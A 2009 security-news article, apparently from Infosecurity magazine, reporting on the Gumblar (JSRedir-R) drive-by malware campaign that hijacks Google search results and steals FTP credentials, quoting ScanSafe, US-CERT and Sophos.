RSS Alerts

Share

More services

Related Links

Related Stories

  • Latest rogue Facebook app dissected by IT security expert
    There are many reports of darkware Facebook apps, but it's rare to find a really thorough analysis of a rogue app. The good news, however, is that Sophos' principal virus researcher Vanja Svajcer has analysed one of the latest apps in some detail.
  • The art of social engineering
    Social engineering is not new and it’s here to stay. Kevin Townsend looks at how social networking is a social engineer’s best friend and asks what we can do to protect ourselves from this very real – and very personal – threat
  • Searching for Security
    With more than 30 000 web pages being compromised every day, search engine results could increasingly lead to malware infection. Kari Larsen asks what the search engines are doing to mitigate security threats, and how users can protect themselves
  • Search for security
    With more than 30 000 web pages being infected every day, search engine results could increasingly lead to malware infection. Kari Larsen asks what the search engines are doing to mitigate security threats, and how users can protect themselves.
  • Infosecurity Weekly Brief - May 18 2009
    Infections, Intrusions, Protections and Misdirections

Top 5 Stories

News

Gumblar malware attack sweeps web

20 May 2009

A modified attack that alters Google searches is taking the web by storm according to security researchers, who have identified more malware domains being used in the attack.

The malware attack, covered in our weekly brief last week, is known by some as Gumblar and by others as JSRedir-R. It installs malware on a victims' machine that locally modifies Google search results, replacing the legitimate results with links to affiliates' pages. This is presumably a money-making tool for the customers that pay the malware gang to distribute the attack.

The malware was originally delivered from a server with a Latvian IP address, according to managed security firm ScanSafe. A script inserted on hacked legitimate websites would force them to connect to the server, delivering a drive-by download to the victims' machine.

Google got wise to the technique, and began de-listing servers that had been infected with the script, but the hackers responded by issuing a more complex, sophisticated script that was obfuscated to avoid detection. This script pointed to the gumblar.cn domain, which delivers malware that takes advantage of unpatched Adobe PDF Reader and Flash applications.

Now, a second domain - Martuz.cn - has been identified, although the site was down all day yesterday, according to ScanSafe researchers, who mused that the attackers may simply be taking a break while the media attention cools. Infected sites pointing to gumblar.cn were up 7% overnight.

"This malware may be used by attackers to monitor network traffic and obtain sensitive information, including FTP and login credentials, that can be used to conduct further exploits," said a United States Computer Emergency Readiness Team (US-CERT) advisory on the attack. FTP credentials could be used to inject the script into more sites, spreading the infection vectors.

Sophos said that the attack was responsible for 42% of drive-by download infections between May 6-13.

This article is featured in:
Internet and Network Security • Malware and Hardware Security

 

Comment on this article

You must be registered and logged in to leave a comment about this article.

Terms & Conditions |Privacy |Website Design|Reed Exhibitions. All rights reserved. Copyright © 2012